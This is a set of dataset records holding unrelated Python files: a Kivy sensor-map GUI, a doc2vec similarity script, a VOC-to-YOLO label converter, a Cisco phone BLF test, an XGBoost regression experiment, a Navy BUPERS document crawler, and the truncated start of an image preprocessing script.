self.unpin_map()\n self.reset_spinners()\n self.reset_map_zoom()\n self.current_marker_id = -1\n\n def pin_map(self):\n self.ids.sensor.text = \"Sensor Seciniz\"\n self.unpin_map()\n self.ids.sensor.values = []\n sensors = self.regions.get_sensors(self.ids.region.text)\n 
for index, row in sensors.iterrows():\n file = RegionSelector.build_file_name(self.ids.region.text, row.ID)\n exists = RegionSelector.check_data_exist(file)\n marker = MyMarker(self, row.percentage, exists, row.address, lon=row.long, lat=row.lat)\n self.markers[row.ID] = marker\n self.ids.map.add_marker(marker)\n self.ids.sensor.values.append(row.address)\n self.reset_map_zoom()\n avg_lat, avg_lon = self.get_center_of_markers()\n self.ids.map.lat = avg_lat\n self.ids.map.lon = avg_lon\n self.ids.map.zoom = 12\n\n def focus_marker(self):\n id = self.regions.find_id_from_address(self.ids.sensor.text)\n self.markers[id].source = \"./marker_ims/blue.png\"\n self.current_marker_id = id\n\n def release_marker_focus(self):\n self.markers[self.current_marker_id].source = self.markers[self.current_marker_id].default_source\n self.current_marker_id = -1\n\n def get_center_of_markers(self):\n if len(self.markers) == 0:\n return 41.091602, 29.066435\n avg_lat = 0\n avg_lon = 0\n for marker in self.markers.values():\n avg_lat += marker.lat\n avg_lon += marker.lon\n avg_lat /= len(self.markers)\n avg_lon /= len(self.markers)\n return avg_lat, avg_lon\n\n def reset_map_zoom(self):\n self.ids.map.lat = 41.091602\n self.ids.map.lon = 29.066435\n self.ids.map.zoom = 10\n\n def build_result_title(self):\n return self.ids.sensor.text + \"/\" + self.ids.region.text\n \n def unpin_map(self):\n if len(self.markers) > 0:\n for marker in self.markers.values():\n self.ids.map.remove_marker(marker)\n self.markers = {}\n\n def reset_spinners(self):\n self.ids.region.text = \"Bolge Seciniz\"\n self.ids.sensor.text = \"Sensor Seciniz\"\n self.ids.sensor.values = []\n\n def on_sensor_spinner_text_change(self):\n if self.manager.current == \"hyper\":\n if self.current_marker_id != -1:\n self.release_marker_focus()\n \n if self.ids.sensor.text != \"Sensor Seciniz\":\n self.focus_marker()\n \nclass SettingsPopUp(Popup):\n pass\n\n\nclass TrainScreen(Screen):\n\n def update_results(self, epoch_history, current_epoch, max_epoch): \n self.ids.header.text = \"EPOK: \" + str(current_epoch) + \"/\" + str(max_epoch)\n self.save_epoch_history_figure(epoch_history, current_epoch, max_epoch)\n self.update_image()\n epoch_info_text = \"Eğitim MAPE: \" + str(round(epoch_history[\"train\"][current_epoch-1],3)) + \"\\n\"\n epoch_info_text += \"Test MAPE: \" + str(round(epoch_history[\"test\"][current_epoch-1],3))\n self.ids.result.text = epoch_info_text\n\n def see_all_results_button_click(self):\n self.manager.current = self.manager.screens[2].name\n\n @mainthread\n def update_image(self):\n self.ids.graph.source = self.fig_path\n\n def go_back_button(self):\n self.reset_screen()\n self.manager.screens[0].app.title = self.manager.screens[0].app.default_title\n self.manager.screens[1].ids.results.disabled = True\n self.manager.screens[1].ids.home.disabled = True\n self.manager.current = \"hyper\"\n \n def save_epoch_history_figure(self, epoch_history, current_epoch, max_epoch):\n indexes = [i for i in range(1, 1 + len(epoch_history[\"train\"]))]\n fig = plt.figure()\n plt.style.use('dark_background')\n ax = fig.add_axes([0.1,0.1,0.8,0.8])\n ax.set_xlim([1,max_epoch])\n ax.set_ylim([0,100])\n plt.title(label=\"Epok Gecmisi\")\n ax.plot(indexes, epoch_history[\"train\"], label=\"Eğitim MAPE\")\n ax.plot(indexes, epoch_history[\"test\"], label=\"Test MAPE\")\n ax.legend()\n self.fig_path = \"epoch_his/fig_\" + str(current_epoch) + \".png\" \n fig.savefig(self.fig_path) \n ax.cla()\n\n @mainthread\n def reset_screen(self):\n self.fig_path = 
\"epoch_his/default.png\"\n self.update_image()\n self.ids.header.text = \"Ilk epok sonuclari bekleniyor\"\n self.ids.result.text = \"\"\n\n\nclass ResultsScreen(Screen):\n\n frame_list = ObjectProperty()\n column_headings =ObjectProperty()\n rv_data = ListProperty([]) \n \n def __init__(self, **kwargs):\n super(ResultsScreen, self).__init__(**kwargs)\n\n self.column_headings.add_widget(Label(text=\"Tarih\"))\n self.column_headings.add_widget(Label(text=\"Gercek Deger\"))\n self.column_headings.add_widget(Label(text=\"Tahmin\"))\n\n def get_dataframe(self):\n df = pd.read_csv(file_name)\n data = []\n for row in df.itertuples():\n for i in range(1, len(row)):\n data.append([row[i], row[0]])\n self.rv_data = [{'text': str(x[0]), 'Index': str(x[1]), 'selectable': True} for x in data]\n\n def go_back_button(self):\n self.manager.current = \"train\"\n\n def go_home_button(self):\n self.manager.screens[0].app.title = self.manager.screens[0].app.default_title\n self.manager.screens[1].ids.results.disabled = True\n self.manager.screens[1].ids.home.disabled = True\n self.manager.screens[1].reset_screen()\n self.manager.current = \"home\"\n\n\nclass HomeScreen(Screen):\n \n def go_to_hyper_screen(self):\n self.manager.current = self.manager.screens[0].name\n\n\nclass MyMarker(MapMarker):\n\n def __init__(self, screen, percentage,has_data, address,*args, **kwargs):\n super(MyMarker, self).__init__(*args, **kwargs)\n self.screen = screen\n if percentage < 80:\n self.source = \"./marker_ims/red.png\"\n elif has_data:\n self.source = \"./marker_ims/green.png\"\n else:\n self.source = \"./marker_ims/yellow.png\"\n self.default_source = self.source\n self.address = address\n \n def update_sensor_spinner_text(self):\n self.screen.ids.sensor.text = self.address\n\n\nclass PreprocessPopup(Popup):\n pass\n\n\nMapApp().run()\n\n","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":12923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"199236070","text":"import math\n\ndef average(x):\n assert len(x) > 0\n return float(sum(x)) / len(x)\n\ndef pearson_def(x, y):\n assert len(x) == len(y)\n n = len(x)\n assert n > 0\n avg_x = average(x)\n avg_y = average(y)\n diffprod = 0\n xdiff2 = 0\n ydiff2 = 0\n for idx in range(n):\n xdiff = x[idx] - avg_x\n ydiff = y[idx] - avg_y\n diffprod += xdiff * ydiff\n xdiff2 += xdiff * xdiff\n ydiff2 += ydiff * ydiff\n\n return diffprod / math.sqrt(xdiff2 * ydiff2)\n\t\nfrom collections import namedtuple\nfrom gensim.models import doc2vec\n# Load data\n\n#doc1 = [\"This is a sentence\", \"This is another sentence\"]\na=input(\"Enter the First sentence: \")\nb=input(\"Enter the Second sentence: \")\ndoc1=[a,b]\n# Transform data (you can add more data preprocessing steps) \n\ndocs = []\nanalyzedDocument = namedtuple('AnalyzedDocument', 'words tags')\nfor i, text in enumerate(doc1):\n words = text.lower().split()\n tags = [i]\n docs.append(analyzedDocument(words, tags))\n\n# Train model (set min_count = 1, if you want the model to work with the provided example data set)\n\nmodel = doc2vec.Doc2Vec(docs, size = 100, window = 300, min_count = 1, workers = 4)\n\n\n\nresult=\tpearson_def(model.docvecs[0],model.docvecs[1])+1\n#result=\tpearson_def(a,b)+1\n#result1 = 1 - spatial.distance.cosine(model.docvecs[0],model.docvecs[1])\nprint(result)","sub_path":"Pearson 
similarity/Pearson.py","file_name":"Pearson.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"192983689","text":"import xml.etree.ElementTree as ET\nimport pickle\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\nimport glob\n\n\nclasses = [\"surgicaltool\"]\n\n\ndef convert(size, box):\n    dw = 1./size[0]\n    dh = 1./size[1]\n    x = (box[0] + box[1])/2.0\n    y = (box[2] + box[3])/2.0\n    w = box[1] - box[0]\n    h = box[3] - box[2]\n    x = x*dw\n    w = w*dw\n    y = y*dh\n    h = h*dh\n    return (x,y,w,h)\n\ndef convert_annotation(annotation, text_path):\n    in_file = open(annotation)\n    tree=ET.parse(in_file)\n    root = tree.getroot()\n    file_name, _ = os.path.splitext(root.find('filename').text)\n    out_file = open(text_path+file_name+'.txt', 'w')\n    size = root.find('size')\n    w = int(size.find('width').text)\n    h = int(size.find('height').text)\n\n    for obj in root.iter('object'):\n        difficult = obj.find('difficult').text\n        cls = obj.find('name').text\n        if cls not in classes or int(difficult) == 1:\n            continue\n        cls_id = classes.index(cls)\n        xmlbox = obj.find('bndbox')\n        b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))\n        bb = convert((w,h), b)\n        out_file.write(str(cls_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n\nxml_path = '/home/ankit.gupta/tool_detect_yolo/dataset/train_annot_folder/'\ntxt_path = '/home/ankit.gupta/yolo_pytorch/pytorch-0.4-yolov3/data/annotations_txt/'\ndataset = '/home/ankit.gupta/yolo_pytorch/pytorch-0.4-yolov3/data/'\nsplit_ratio = 0.2\n\nif not os.path.exists(txt_path):\n    os.mkdir(txt_path)\nannotations_xml = glob.glob(xml_path+'*.xml')\nlist_file_train = open(dataset + 'train.txt', 'w')\nlist_file_valid = open(dataset + 'valid.txt', 'w')\nsample_factor = int(1/split_ratio)\nfor i in range(len(annotations_xml)):\n    tree=ET.parse(annotations_xml[i])\n    root = tree.getroot()\n    image_id = root.find('path').text\n    if (i+1)%sample_factor == 0:\n        list_file_valid.write(image_id+'\\n')\n    else:\n        list_file_train.write(image_id+'\\n')\n    convert_annotation(annotations_xml[i], txt_path)\n","sub_path":"scripts/voc_label.py","file_name":"voc_label.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"351368464","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nName:\n    cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User.py\n\nPurpose:\n    This test case verifies the DUT using BLF line key to call the monitored\n    user. Pressing the line key for a monitored user in Idle state should\n    result in a call to the monitored user's extension.\n\nAuthor:\n    Anuradha N(anakre@cisco.com)\n\nReferences:\n    BW-SIPPhone-FunctionalTestPlan-R21.0\n    US25693\n\nDescription:\n    Originate a call from the DUT to one of the DUT's monitored users by\n    pushing the line key for the monitored user. Answer the call.\n\nTopology:\n    1. 2 3pcc phones.\n    2. Both the phones should register successfully before running the script\n    3. BLF should be configured on monitoring user phone.\n    4. Make sure at least 1 user is added as monitored user.\n    5. Create a call pickup group by browsing to Services->Resources and\n       ensure that DUT and monitored users are added.\n\nPass/Fail Criteria:\n    1. 
Check that the lamp state is fast blinking red when the monitored user\n is ringing\n 2. Check that the lamp state is solid red when the user is connected\n 3. Check that the lamp state is steady and green when monitored user is\n idle.\n\nTest Steps:\n 1. DUT (Phone A) calls phone B by pushing the line key for Phone B\n 2. Phone B answers the call after few rings.\n 3. Phone A and Phone B are connected.\n 4. DUT disconnects the call.\n\n Verify:\n 1. Phone B rings\n 2. DUT monitored line lamp for Phone B is Fast blinking red(inbound\n alerting)\n 3. Phone B answers the call.\n 4. Phone B and Phone A are connected\n 5. DUT monitored line lamp for Phone B is solid red\n 6. DUT disconnects the call\n 7. DUT monitored line lamp for Phone B is green/off\n\nNotes:\n\nKnown Bugs:\n\n\"\"\"\n\nimport tng\nimport logging\nfrom tng_sl.device.endpoint.synergylite.synergylite_3pcc_extended \\\n import wait_for_ccapi_call_states, poll_feature_state\nfrom tng_sl.plugins.synergylite_3pcc_ui import SynergyLite3pccUiHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\n\nlog = logging.getLogger('BlfCallMonitoredUser')\n\n\nclass BlfCallMonitoredUser(SetupHelpersTestCase, tng.api.TestCase):\n helpers = (\n PhoneConfigHelper, PhoneLineRegHelper, TsharkHelper,\n BroadsoftLoginHelper)\n helper_num_devices = 2\n\n def setUp(self):\n log.info(\"Start of setUp method\")\n\n self.serverproxy = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"as_ip_addr\")\n\n self.proxy = self.phone_data['proxy']\n self.xsi_user_id1 = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"xsi_user_id1\")\n self.xsi_user_id2 = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"xsi_user_id2\")\n self.uri_name = '{}_blf@{}'.format(self.user_id1, self.proxy)\n\n self.broadsoft = BroadsoftConfig()\n log.info(\"Enable busy lamp field in the server\")\n self.broadsoft.set_busy_lamp_field(\n list_uri=self.uri_name,\n blf_monitored_user_id=[self.xsi_user_id2],\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n def broadsoft_cleanup():\n log.info(\"CleanUp configured BLF from the server\")\n self.broadsoft.set_busy_lamp_field(\n list_uri=self.uri_name, blf_monitored_user_id=[],\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n self.addCleanup(broadsoft_cleanup)\n\n self.call_pickup_group = self.bsoft_web.create_callpickup_group(\n [self.user_id2, self.user_id1])\n\n def broadsoft_delete_callpickup_group():\n self.bsoft_web.delete_callpickup_group(self.call_pickup_group)\n\n self.addCleanup(broadsoft_delete_callpickup_group)\n\n log.info(\"End of setUp method\")\n\n def test_blf_call_monitored_user(self):\n\n log.info(\"Start of test_blf_call_monitored_user\")\n\n self.oPhone1.ui.set_web_parameter_http(\n BLF_List_Uri=['Att Console', 'BLF List URI', self.uri_name],\n Use_line_keys=['Att Console', 'Use Line Keys For BLF List', 1])\n\n list_uri_name, use_line_keys = self.oPhone1.get_web_config(\n 'BLF_List_URI', 'Use_Line_Keys_For_BLF_List')\n\n self.assertEqual(self.uri_name, list_uri_name)\n self.assertEqual(\"Yes\", use_line_keys)\n\n filter_cmd = (\n 'port sip and (host {} or host {})'.format(\n 
self.oPhone1.ip, self.oPhone2.ip))\n log.info('Start tshark on linux with filter {}'.format(filter_cmd))\n capture_file = self.tshark.tshark_start(filter_cmd)\n\n log.info(\n 'Phone A calls phone B {} by pressing monitored line key'.format(\n self.user_id2))\n self.oPhone1.ccapi.sendKey(SynergyLite3pccUiHelper.PK_LN2, 1, '0000')\n wait_for_ccapi_call_states(self.devices, ('PROCEEDING', 'RINGING'))\n\n log.info('Check for Phone B ALERTING state in Phone A')\n poll_feature_state(\n self.oPhone1, 2, ['State', 'LedColor', 'LedCadence'],\n expected_state=['ALERTING', 'RED', 'FAST_BLINK'])\n\n log.info('Phone B accepts the call')\n self.oPhone2.ccapi.accept('0000')\n wait_for_ccapi_call_states(self.devices, ('CONNECTED', 'CONNECTED'))\n log.info('Check for Phone B INUSE state in Phone A')\n poll_feature_state(\n self.oPhone1, 2, ['State', 'LedColor', 'LedCadence'],\n expected_state=['INUSE', 'RED', 'STEADY'])\n\n log.info('Phone A ends the call')\n self.oPhone1.ccapi.hangUp('0000')\n wait_for_ccapi_call_states(self.devices, ('IDLE', 'IDLE'))\n log.info('Check for Phone B IDLE state in Phone A')\n poll_feature_state(\n self.oPhone1, 2, ['State', 'LedColor', 'LedCadence'],\n expected_state=['IDLE', 'GREEN', 'STEADY'])\n\n log.info('Stop tshark on linux')\n self.tshark.tshark_stop()\n log.info('End of test_blf_call_monitored_user')\n\n\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/IOT/Broadsoft_Functional/cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User.py","file_name":"cmCC25693_3pcc_BS_Functional_291_Call_Monitored_User.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"20639538","text":"import re\nimport numpy as np\nimport pandas as pd\nimport sys\nimport os\nimport time\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom xgboost import XGBRegressor\nfrom sklearn.metrics import mean_squared_error\n\nloss = []\nfor i in range(500):\n print(\"Epoch: \",i)\n PERTUBTIME = 2\n A_data_len = [67 ,100 ,100 ,100]\n feat_data = pd.read_csv(\"TSfeatA1Benchmark.csv\",index_col = 0)\n lab_data = pd.read_csv(\"A1_Label.csv\",index_col = 0)\n feat_data = feat_data.values\n lab_data = lab_data.values\n mean_thre = np.reshape(((lab_data[:,-1] + lab_data[:,-2])/2),(-1,1))\n lab_data = np.append(lab_data,mean_thre,axis = 1)\n #Prepare for final training data\n training_data = np.array([])\n feat_data_reglab = np.append(feat_data,mean_thre,axis = 1)\n scaler_Train = MinMaxScaler(feature_range=(-1, 1))\n feat_data_reglab = scaler_Train.fit_transform(feat_data_reglab,(-1,1))\n\n for i in range(A_data_len[0]):\n\n #for unhandling data\n if lab_data[i,0] == 0:\n \n training_data = np.append(training_data,feat_data_reglab[i,:])\n training_data = np.append(training_data,0)\n continue\n\n #for data who didn't utilize X'(t)\n elif lab_data[i,1] == 1:\n\n buffer = np.array([])\n\n for j in range(int(3*PERTUBTIME)):\n\n per_ele = np.random.randint(-1,1, size=feat_data_reglab.shape[1])\n final_input = feat_data_reglab[i,:] + (feat_data_reglab[i,:]*per_ele/100)\n buffer = np.append(buffer,final_input)\n buffer = np.append(buffer,1)\n \n buffer = np.reshape(buffer,(-1,feat_data_reglab.shape[1]+1))\n training_data = np.append(training_data,buffer)\n\n #for optsaliency map\n else:\n\n buffer = np.array([])\n\n for j in 
range(PERTUBTIME):\n\n per_ele = np.random.randint(-1,1, size=feat_data_reglab.shape[1])\n final_input = feat_data_reglab[i,:] + (feat_data_reglab[i,:]*per_ele/100)\n buffer = np.append(buffer,final_input)\n buffer = np.append(buffer,0)\n \n buffer = np.reshape(buffer,(-1,feat_data_reglab.shape[1]+1))\n training_data = np.append(training_data,buffer)\n #[:,-1] ==> label of Xt (for classify),[:,-2] ==> label of threshold (for regression)\n training_data = np.reshape(training_data,(-1,feat_data_reglab.shape[1]+1))\n\n #==============\n #start training ---> PCA+DNN\n EPOCHS = 500\n BATCHSIZE = 10\n HIDDEN_NEURON_SCALE = 4\n PCA_COMPONENTS = 10\n\n pca = PCA(n_components=PCA_COMPONENTS)\n pca.fit(training_data[:,:-2])\n training_data_pca = pca.transform(training_data[:,:-2])\n stick_reglab = np.reshape(training_data[:,-2],(-1,1))\n training_data_pca = np.append(training_data_pca,stick_reglab,axis = 1)\n scaler_DNN = MinMaxScaler(feature_range=(-1, 1))\n training_data_pca = scaler_DNN.fit_transform(training_data_pca,(-1,1))\n\n #split into the train and test set\n row = round(0.9 * training_data_pca.shape[0])\n np.random.shuffle(training_data_pca)\n train = training_data_pca[:int(row), :]\n x_train = train[:, :-1]\n y_train = train[:, -1]\n x_test = training_data_pca[int(row):, :-1]\n y_test = training_data_pca[int(row):, -1]\n\n #print(x_train.shape[1])\n #print(x_test.shape)\n\n model = XGBRegressor(colsample_bytree=0.4603, gamma=0.0468, \n learning_rate=0.05, max_depth=3, \n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, random_state =7, nthread = -1).fit(x_train,y_train)\n predicted = model.predict(x_test)\n predicted = predicted.reshape(len(predicted),1)\n\n #print(predicted.shape)\n inverse_x = np.concatenate((x_test, predicted), axis=1)\n inverse_x = scaler_DNN.inverse_transform(inverse_x)\n inverse_x = inverse_x[:,-1]\n inverse_x = np.reshape(inverse_x,(-1,1))\n inverse_x = np.concatenate((training_data[-len(inverse_x):,:-2], inverse_x), axis=1)\n inverse_x = scaler_Train.inverse_transform(inverse_x)\n inverse_x = inverse_x[:,-1]\n\n y_test = y_test.reshape((len(y_test), 1))\n inverse_y = np.concatenate((x_test, y_test), axis=1)\n inverse_y = scaler_DNN.inverse_transform(inverse_y)\n inverse_y = inverse_y[:,-1]\n inverse_y = np.reshape(inverse_y,(-1,1))\n inverse_y = np.concatenate((training_data[-len(inverse_y):,:-2], inverse_y), axis=1)\n inverse_y = scaler_Train.inverse_transform(inverse_y)\n inverse_y = inverse_y[:,-1]\n loss.append(mean_squared_error(inverse_y,inverse_x))\n print('mse = ' , mean_squared_error(inverse_y,inverse_x))\nloss = np.array(loss)\nprint(loss)\nprint(\"Mean: \",np.mean(loss))\nprint(\"Population std: \", np.std(loss, ddof=0))\nprint(\"Sample std: \", np.std(loss, ddof=1))\n# fig = plt.figure(facecolor='white')\n# ax = fig.add_subplot(111)\n# ax.plot(inverse_y, label='True Data')\n# plt.plot(inverse_x, label='Prediction')\n# plt.legend()\n# plt.show()","sub_path":"xgb.py","file_name":"xgb.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"382162038","text":"import bs4\nimport re\nimport os\nimport requests\nimport json\nimport datetime\nfrom typing import Iterable\n\nfrom dataPipelines.gc_crawler.requestors import MapBasedPseudoRequestor\nfrom dataPipelines.gc_crawler.exec_model import Crawler, Parser, Pager\nfrom dataPipelines.gc_crawler.data_model import Document, DownloadableItem\nfrom dataPipelines.gc_crawler.utils 
import abs_url\n\nfrom . import SOURCE_SAMPLE_DIR, BASE_SOURCE_URL\n\n\nclass BupersPager(Pager):\n \"\"\"Pager for Bupers crawler\"\"\"\n\n def iter_page_links(self) -> Iterable[str]:\n \"\"\"Iterator for page links\"\"\"\n yield self.starting_url\n\nclass BupersParser(Parser):\n \"\"\"Parser for Bupers Issuance crawler\"\"\"\n\n def parse_docs_from_page(self, page_url: str, page_text: str) -> Iterable[Document]:\n \"\"\"Parse document objects from page of text\"\"\"\n\n r = requests.get(page_url)\n soup = bs4.BeautifulSoup(r.content, features=\"html.parser\")\n name = soup.find(id='dnn_CenterPane_Top').find('a')['name']\n pdf_url = soup.find(id='LiveHTMLWrapper' + name).find_all('a')\n pdf_url = [(\"https://www.mynavyhr.navy.mil\" + item['href']).replace(' ', '%20') for item in pdf_url]\n\n new_url = []\n for i in range(len(pdf_url)):\n if pdf_url[\n i] == 'https://www.mynavyhr.navy.mil/Portals/55/Reference/Instructions/BUPERS/BUPERSINST_12410.25.pdf?ver=mKLgKvdYUIaubAZs0PbkUg%3d%3d':\n pass\n elif pdf_url[i] not in new_url and (pdf_url[i][-4:] != \"docx\"):\n new_url.append(pdf_url[i])\n pdf_url = new_url\n l = soup.find(id='LiveHTMLWrapper' + name).find_all(attrs={'style': 'font-size: 12px;'})\n\n nums = []\n titles = []\n dates = []\n bupcount = 0\n for index, val in enumerate(l):\n try:\n # checking for 1640.20B. first document doesn't have a link, but CH-1 does.\n if val.text.replace('\\xa0', ' ').split('\\n')[-1] == \"1640.20B CH-1\":\n nums.append(val.text.replace('\\xa0', ' ').split('\\n')[-1])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[-1])\n\n # CH-1 for 5450.49D doesn't have a link associated with it\n elif val.text.split('\\n')[-1] == \"5450.49D CH-1\":\n nums.append(\n val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace(' ', \"\").split(\n '\\n')[0])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n\n # checking for the repeated BUPERSNOTE 5215 files\n # for the 2nd repeated file, title/date don't appear\n elif val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '').replace(' ',\n \"\") == \"BUPERSNOTE 5215\":\n if bupcount > 0:\n nums.append(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n',\n '').replace(\n ' ', \"\") + \"(2)\")\n titles.append(\"Cancellation of BUPERSINST 7040.6B\")\n dates.append(\"12/7/2020\")\n else:\n nums.append(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n',\n '').replace(\n ' ', \"\"))\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n bupcount += 1\n\n # checking for the 1900.8E docs. the other 2 chapters don't have links\n elif val.text.split('\\n')[-1] == \"1900.8E CH-2\":\n nums.append(val.text.split('\\n')[0])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n\n # checking for the Women's correction program, 1640.27. 
this file doesn't have a title in the correct format\n elif val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '') == \"1640.27\":\n nums.append(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', ''))\n titles.append(\"Women's Correction Program\")\n dates.append(l[index + 1].text.replace('\\u200b', '').strip())\n\n # checking for the BUPERSNOTE file. This is the only file number that starts with a word, not a number.\n elif val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '')[\n 0:10] == \"BUPERSNOTE\":\n nums.append(\n val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '').replace(\n \" \", \"\"))\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip())\n\n # checking for all other files:\n elif int(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('.')[0]):\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[0] in (\n \"1401.5C\", \"1730.11A\", \"5800.1A\", \"1640.20B\"):\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 0] == \"1640.20B\":\n pass\n else:\n nums.append(\n val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 0])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', ''))\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 0] == \"5800.1A\":\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n else:\n dates.append(l[index + 2].text.replace('\\u200b', '').strip())\n elif len(val.text.split('\\n')) > 1:\n # for each repeated document\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 1] in (\"Vol 1\", \"Vol 2\"):\n nums.append(\" \".join(\n val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split(\n '\\n')))\n titles.append(l[index + 1].text)\n dates.append(l[index + 2].text.replace('\\u200b', '').split('\\n')[0].strip())\n else:\n for n in val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split(\n '\\n'):\n # append the doc nums\n nums.append(n)\n titles.append(l[index + 1].text)\n for n in l[index + 2].text.strip().replace('\\u200b', '').split('\\n'):\n # append the dates\n dates.append(n.strip())\n else:\n nums.append(val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', ''))\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip())\n except:\n pass\n\n parsed_docs = []\n for i in range(len(pdf_url)):\n dtype = \"BUPERSINST\"\n dnum = nums[i]\n dtitle = titles[i].replace(\"\\u00a0\", \" \").replace(\"\\u200b\", \"\").replace('\\n ', \"\").strip()\n dname = dtype + \" \" + dnum\n cac_login_required = False\n publication_date = dates[i]\n url = pdf_url[i]\n pdf_di = DownloadableItem(doc_type='pdf', web_url=url)\n version_hash_fields = {\n \"item_currency\": url.split('/')[-1].split('?')[0], # version metadata found on pdf links\n \"document_title\": dtitle,\n \"document_number\": dnum.strip()\n }\n doc = Document(\n doc_name=dname.strip(),\n doc_title=dtitle,\n doc_num=dnum.strip(),\n 
doc_type=dtype,\n publication_date=publication_date,\n cac_login_required=cac_login_required,\n crawler_used=\"Bupers_Crawler\",\n source_page_url=page_url.strip(),\n version_hash_raw_data=version_hash_fields,\n downloadable_items=[pdf_di]\n )\n\n parsed_docs.append(doc)\n\n return parsed_docs\n\n\nclass BupersCrawler(Crawler):\n \"\"\"Crawler for the example web scraper\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(\n *args,\n **kwargs,\n pager=BupersPager(\n starting_url=BASE_SOURCE_URL\n ),\n parser=BupersParser()\n )\n\n\nclass FakeBupersCrawler(Crawler):\n \"\"\"Bupers crawler that just uses stubs and local source files\"\"\"\n\n def __init__(self, *args, **kwargs):\n with open(os.path.join(SOURCE_SAMPLE_DIR, 'bupers_pubs.html')) as f:\n default_text = f.read()\n\n super().__init__(\n *args,\n **kwargs,\n pager=BupersPager(\n requestor=MapBasedPseudoRequestor(\n default_text=default_text\n ),\n starting_url=BASE_SOURCE_URL\n ),\n parser=BupersParser()\n )\n","sub_path":"dataPipelines/gc_crawler/bupers_pubs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"108812943","text":"\"\"\"\n\nPre-Processing \nUses: CV2\nClassical filters\n\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n#Parameters\n\nIMAGE_FILE = 